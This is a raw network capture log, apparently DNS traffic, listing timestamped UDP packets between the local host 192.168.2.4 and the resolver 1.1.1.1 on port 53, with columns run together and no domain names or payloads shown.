                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881691933 CEST5872053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881891966 CEST6090253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882142067 CEST53539321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882172108 CEST5025253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882776022 CEST5122253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.883016109 CEST53613751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.884644032 CEST6452553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886056900 CEST5925753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886893034 CEST5595553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887682915 CEST53547461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887728930 CEST5292053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887815952 CEST53550331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.888953924 CEST53567191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.891469002 CEST53576411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.892498970 CEST53502521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895062923 CEST53645251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895507097 CEST53592571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895889044 CEST5135553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.896624088 CEST53559551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.897150040 CEST53609021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.898397923 CEST6467653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.899646997 CEST53512221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902045012 CEST5871353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902523994 CEST5096653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903369904 CEST5434853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903477907 CEST5339553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903703928 CEST5597853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903748035 CEST53529201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903959036 CEST5826753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904577017 CEST53513551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904854059 CEST5973953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.907171011 CEST5959453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908323050 CEST5557253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908588886 CEST6273953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908992052 CEST6355153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909188986 CEST6019553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909636974 CEST5069353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909847975 CEST6514853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910372019 CEST5981053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.911515951 CEST53594551.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.912704945 CEST5569353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913244009 CEST53533951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913412094 CEST53559781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913527012 CEST53579291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.913770914 CEST53582671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915453911 CEST53597391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915747881 CEST53635511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.916254044 CEST53555721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.917304993 CEST53595941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.918227911 CEST53587131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.918945074 CEST53601951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.919697046 CEST53598101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.920022011 CEST53506931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.924700975 CEST53627391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925534964 CEST5552353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925791979 CEST5682353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926120996 CEST5834053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST5240353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST6023553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.928853989 CEST53556931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.236727953 CEST53512021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.237457991 CEST53530001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.237699986 CEST53612481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.237739086 CEST53616121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.237821102 CEST53631201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.238035917 CEST53556281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.239217043 CEST53540981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.241246939 CEST53499641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.242331028 CEST53494371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.243988037 CEST53649221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.254717112 CEST53556071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.311276913 CEST5168453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.311600924 CEST6292253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.311845064 CEST6327753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.311958075 CEST4916353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.312364101 CEST6418653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.312452078 CEST5375653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.312870979 CEST6338553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.320955992 CEST53632771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.321021080 CEST53516841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.321942091 CEST53633851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.328293085 CEST53537561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.328305006 CEST53641861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.342431068 CEST53491631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.342881918 CEST53629221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.381634951 CEST53524121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.385588884 CEST53524541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.419977903 CEST6496953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.420964003 CEST5861953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.426424980 CEST5492353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.426553011 CEST6291953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.426712990 CEST5272053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.426892996 CEST6090953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.426959038 CEST6494653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.427244902 CEST6215153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.431353092 CEST53586191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.435281038 CEST53629191.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.436209917 CEST53649691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.436413050 CEST53649461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.436733007 CEST53621511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.436986923 CEST53527201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.437737942 CEST53549231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.441898108 CEST53609091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.469214916 CEST6407253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.469980001 CEST6383153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.472115040 CEST6359353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.472727060 CEST5161653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.474431038 CEST5200453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.477119923 CEST6103553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.477538109 CEST5519553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.480635881 CEST53640721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.480739117 CEST53638311.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.480871916 CEST53635931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.482103109 CEST53516161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.484431982 CEST53520041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.486453056 CEST53610351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.494986057 CEST53551951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.089329958 CEST5921753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.089663982 CEST5626353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.100240946 CEST53562631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.105920076 CEST5556653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.107321978 CEST4942453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.116023064 CEST53555661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.117001057 CEST53494241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.120255947 CEST53592171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.144092083 CEST5496253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.145488024 CEST6083653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.147135973 CEST6451453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.152133942 CEST5298453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.155721903 CEST6517453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.155975103 CEST5824453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.156502962 CEST6254953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.156866074 CEST6463153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.157145977 CEST6307453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.157546043 CEST5182953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.158188105 CEST5461753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.158225060 CEST6477553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.158857107 CEST6476953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.159182072 CEST5753253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.159444094 CEST53645141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.159504890 CEST5871053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.159895897 CEST6546753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.160665035 CEST6167853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.160831928 CEST6085053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.161521912 CEST6389253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.161864042 CEST4986253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.163084030 CEST53529841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.163836956 CEST6169053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.164397955 CEST4979653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.164608955 CEST5279453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.165360928 CEST5566453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.165841103 CEST5637653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.165920019 CEST53582441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.166312933 CEST6436953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.166461945 CEST53630741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.166726112 CEST5452653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.166820049 CEST53625491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.167125940 CEST53546171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.167517900 CEST4980653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.167612076 CEST5825153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.167814016 CEST53647751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.168639898 CEST53575321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.168739080 CEST53587101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.169087887 CEST53647691.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.169270039 CEST53616781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.717827082 CEST5344553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718030930 CEST6421353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.718224049 CEST6244753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.725353003 CEST53526841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.725753069 CEST53536461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.726052999 CEST53585451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.726419926 CEST53583931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.728228092 CEST53624471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.731885910 CEST53645761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.733122110 CEST53534451.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735032082 CEST5647153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735340118 CEST6483453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735480070 CEST5312053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735691071 CEST5366853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.735889912 CEST5579753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736342907 CEST5309253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736438990 CEST5243653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736637115 CEST5492153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736746073 CEST6265353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST6055853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.736947060 CEST5948653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737179995 CEST5527153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737355947 CEST6135353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.737540960 CEST5053853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741564989 CEST5190153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741636038 CEST5011353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.741815090 CEST6365753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742003918 CEST5430053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742161036 CEST4968953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742178917 CEST6025453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742369890 CEST5000653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742635012 CEST6010653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.742676973 CEST5016553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.743275881 CEST5016153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.744973898 CEST53531201.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.744986057 CEST53564711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745352983 CEST53594861.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745429039 CEST53648341.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.745640993 CEST53557971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746011972 CEST53530921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746246099 CEST53524361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746256113 CEST53605581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.746452093 CEST53505381.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.747025967 CEST53613531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751064062 CEST53519011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751157999 CEST53536681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751651049 CEST53501651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751696110 CEST53602541.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.751784086 CEST53636571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752136946 CEST53626531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752175093 CEST53549211.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.752661943 CEST53500061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.753031015 CEST53552711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.757555008 CEST53496891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.757936954 CEST53501131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.758163929 CEST53501611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.758394003 CEST53601061.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.772624969 CEST53543001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.877535105 CEST53642131.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.623008013 CEST6016653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.626430988 CEST4939753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.628856897 CEST5560953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.635159969 CEST5437153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.638818026 CEST53493971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.640563011 CEST53601661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.640708923 CEST5165653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.642151117 CEST53556091.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.645523071 CEST53543711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.650935888 CEST53516561.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.666471004 CEST6425953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.676008940 CEST53642591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.684571028 CEST6507653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.685777903 CEST5813653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.696305990 CEST53650761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.701040030 CEST53581361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705532074 CEST6542553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.705928087 CEST5768453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706367016 CEST5771253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.706991911 CEST5363953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.709281921 CEST5153953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.717787027 CEST53654251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.717880964 CEST53576841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.718170881 CEST53536391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.718184948 CEST53577121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.728646994 CEST53515391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.735200882 CEST5341453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.738208055 CEST5905153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.740416050 CEST6317953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.744962931 CEST5680553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.747242928 CEST5248953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.749761105 CEST6443953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750174999 CEST53590511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750525951 CEST5307253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.751035929 CEST53534141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.751461983 CEST6303353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.752343893 CEST53631791.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.754790068 CEST53568051.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.757179022 CEST53524891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.759820938 CEST53530721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.759926081 CEST5617653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760253906 CEST6540253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760451078 CEST6098053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.760865927 CEST5751953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761293888 CEST6478953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.761313915 CEST53630331.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.034301996 CEST53654231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.035715103 CEST53554221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036170006 CEST53646851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036370039 CEST53643141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036802053 CEST53552901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.037882090 CEST53503761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.038156986 CEST53537481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039237022 CEST53499111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039293051 CEST53642181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039988041 CEST53510681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040024996 CEST53642521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040086031 CEST53540711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040721893 CEST53598891.1.1.1192.168.2.4
